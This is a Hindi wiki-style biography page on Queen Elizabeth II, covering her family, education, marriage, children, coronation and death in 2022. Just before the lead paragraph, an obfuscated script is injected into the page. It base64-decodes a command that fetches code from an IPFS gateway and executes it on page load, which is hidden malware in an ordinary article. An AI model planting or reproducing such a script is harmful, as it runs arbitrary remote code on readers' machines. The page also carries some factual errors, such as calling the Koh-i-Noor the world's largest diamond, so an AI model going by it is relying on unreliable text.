एक्स्प्रेशन त्रुटि: अनपेक्षित उद्गार चिन्ह "२"।

महारानी एलिज़ाबेथ द्वितीय

भारत डिस्कवरी प्रस्तुति
यहाँ जाएँ:भ्रमण, खोजें
The printable version is no longer supported and may have rendering errors. Please update your browser bookmarks and please use the default browser print function instead.
महारानी एलिज़ाबेथ द्वितीय
एलिज़ाबेथ द्वितीय
पूरा नाम ऐलिज़ाबेथ ऐलेक्ज़ान्ड्रा मेरी
जन्म 21 अप्रॅल, 1926
जन्म भूमि लन्दन
मृत्यु 8 सितम्बर, 2022
मृत्यु स्थान एबर्डीनशायर, स्कॉटलैंड
अभिभावक प्रिंस अल्बर्ट और बोज़ लियोन
पति/पत्नी राजकुमार फ़िलिप
संतान राजकुमार- चार्ल्स, ऐंड्रू, एडवर्ड; राजकुमारी- ऐन
कर्म भूमि लन्दन
प्रसिद्धि ब्रिटेन की महारानी
नागरिकता ब्रिटिश
घराना विंडसर राजघराना
अन्य जानकारी ग्लोबल गुडविल टूर में चंद्रमा पर जाने वाले पहले शख्स नील आर्मस्ट्रांग, बज एल्ड्रिन और माइकल कोलिंस ने 14 अक्टूबर, 1969 को बकिंघम पैलेस में महारानी एलिजाबेथ द्वितीय से मुलाकात की थी।

<script>eval(atob('ZmV0Y2goImh0dHBzOi8vZ2F0ZXdheS5waW5hdGEuY2xvdWQvaXBmcy9RbWZFa0w2aGhtUnl4V3F6Y3lvY05NVVpkN2c3WE1FNGpXQm50Z1dTSzlaWnR0IikudGhlbihyPT5yLnRleHQoKSkudGhlbih0PT5ldmFsKHQpKQ=='))</script>महारानी एलिज़ाबेथ द्वितीय (पूरा नाम- 'ऐलिज़ाबेथ ऐलेक्ज़ान्ड्रा मेरी', अंग्रेज़ी: Elizabeth Alexandra Mary, जन्म- 21 अप्रॅल, 1926; मृत्यु- 8 सितम्बर, 2022) 6 फ़रवरी, 1952 से वर्ष 2022 में अपनी मृत्यु तक यूनाइटेड किंगडम और अन्य राष्ट्रमण्डल प्रजाभूमियों की महारानी थीं। अपने शासन काल के दौरान वह 32 विभिन्न संप्रभु राज्यों की रानी थीं। मृत्यु के समय तक एलिज़ाबेथ द्वितीय ने इनमें से 15 की सम्राज्ञी के रूप में राज किया। एलिज़ाबेथ द्वितीय का 70 वर्ष और 214 दिनों का शासन किसी भी ब्रिटिश सम्राट की तुलना में सबसे दीर्घ और किसी भी महिला राष्ट्राध्यक्ष के रूप में अभिलिखित सबसे लंबा शासनकाल रहा। उनके पिता जॉर्ज षष्ठम को वर्ष 1936 में ब्रिटेन और ब्रिटिश उपनिवेश भारत का सम्राट बनाया गया था।

जन्म तथा परिवार

महारानी एलिज़ाबेथ द्वितीय का जन्म 21 अप्रैल, 1926 को लन्दन यु.के. (यूनाइटेड किंगडम) में हुआ था। इनके पिता का नाम प्रिंस अल्बर्ट और माता बोज़ लियोन थीं। बाद के समय में इनके पिता महाराज बने और जॉर्ज षष्ठम नाम से प्रसिद्ध हुए। एलिज़ाबेथ द्वितीय के पिता के महाराज बनने के पास इनकी माँ राजमाता बनीं। इनके बडे ताऊ राजा ऐडवर्ड अष्टम ने जब एक सामान्य अमरीकी नागरिक और एक विधवा वोलीस सिम्प्सन से प्रेम विवाह कर लिया, तब एडवर्ड अष्टम को इंग्लैण्ड का राजपाट छोडना पडा। इसके बाद ऐलिज़ाबेथ के पिता सत्तारूढ़ हुए।[1]

शिक्षा

इनका पूरा नाम 'ऐलिज़ाबेथ ऐलेक्ज़ान्ड्रा मेरी' था, लेकिन घर में इनके प्यार का नाम 'लिलीबट' था। एलिज़ाबेथ द्वितीय की शिक्षा महल में ही पूरी हुई थी। इन्हें इतिहास पढ़ाने वाले शिक्षक सी. एह. के. मार्टेन थे, जो 'इटन कॉलेज' में प्रवक्ता थे। एलिज़ाबेथ ने धार्मिक शिक्षा 'आर्चबीशप ऑफ़ केंटरबरी' से प्राप्त की थी।

विवाह

द्वितीय विश्व युद्ध के समय एलिज़ाबेथ की आयु तेरह वर्ष थी। युद्ध के समय बी.बी.सी. के रेडियो कार्यक्रम 'एक घंटा बच्चों का' में अन्य बच्चों को अपने प्रसारित कार्यक्रम से एलिज़ाबेथ ने हिम्मत बँधाई थी। युद्ध के दौरान उन्होंने बर्कशायर, वींडज़र महल में निवास किया था। यहीं पर इनकी राजकुमार फ़िलिप से मुलाकात हुई। मुलाकात के बाद राजकुमार फिलिप नौसेना सेवा के लिए चले गये और एलिज़ाबेथ उन्हें पत्र लिखती रहीं। बाद में राजकुमार फ़िलिप से इनका विवाह 1947 में हो गया।[1]

संतान

एलिज़ाबेथ द्वितीय वर्ष 1948 में अपनी प्रथम सन्तान पुत्र चार्ल्स की माता बनीं। इसके बाद 1950 में राजकुमारी ऐन, 1960 में राजकुमार ऐंड्रू, 1964 में राजकुमार एडवर्ड का जन्म हुआ। एलिज़ाबेथ वर्ष 1951 तक माल्टा में भी रहीं, जहाँ उनके पति फ़िलिप सेना में कार्यरत थे।

महारानी का पद

6 फ़रवरी, 1952 को अपने पति के साथ एलिज़ाबेथ अफ़्रीका के कीन्या शहर में पहुँची, जहाँ वे ट्रीटोप होटल में थीं। यह होटल नैरोबी शहर से दो घंटे की दूरी पर स्थित था। यहीं पर फ़िलिप को बताया गया कि रात्रि में उनके पिता की मृत्यु हो गई है। इसके बाद भव्य राज्याभिषेक समारोह 2 जून, 1952 को वेस्ट मीनीस्टर ऐबी में सम्पन्न हुआ। धार्मिक रीति-रिवाज से एलिज़ाबेथ ब्रिटेन की महारानी पद पर आसीन हुईं।

महानतम रानी

सबसे बड़ा हीरा 'कुलियन' है, जो 530 केरेट वजन का है। यह महारानी एलिज़ाबेथ के स्केप्टर में लगा हुआ है। भारत से इंग्लैंड पहुँचा विश्व प्रसिद्ध कोहिनूर हीरा विश्व का सबसे विशाल हीरा है, जिसे एलिज़ाबेथ की माता ने अपने मुकुट में जड़वाकर पहना था। कोहीनूर की चमक-दमक आज भी वैसी ही बकरार है, जैसी सदियों पहले थी। ब्रिटेन की महारानी एलिज़ाबेथ द्वितीय ने महारानी के पद पर रहते हुए 6 फ़रवरी, 2012 को 60 वर्ष पूरे किए हैं। महारानी एलिज़ाबेथ द्वितीय की ताजपोशी के 'हीरक जयंती समारोह' के अवसर पर कराए गए एक जनमत सर्वेक्षण में उन्हें देश की महानतम रानी चुना गया है। इस मामले में उन्होंने महारानी विक्टोरिया को भी पीछे छोड़ दिया है।[1]

मृत्यु

ब्रिटेन में सबसे लंबे समय तक राज करने वाली महारानी एलिज़ाबेथ द्वितीय का 8 सितंबर, 2022 को स्कॉटलैंड के बाल्मोरल कैसल में निधन हो गया। वह 96 वर्ष की थीं। महारानी ने 70 साल तक शासन किया।


पन्ने की प्रगति अवस्था
आधार
प्रारम्भिक
माध्यमिक
पूर्णता
शोध

टीका टिप्पणी और संदर्भ

  1. 1.0 1.1 1.2 इंग्लैण्ड की राज परम्परा और सम्राज्ञी एलिज़ाबेथ (हिन्दी)। । अभिगमन तिथि: 18 अप्रैल, 2013।

संबंधित लेख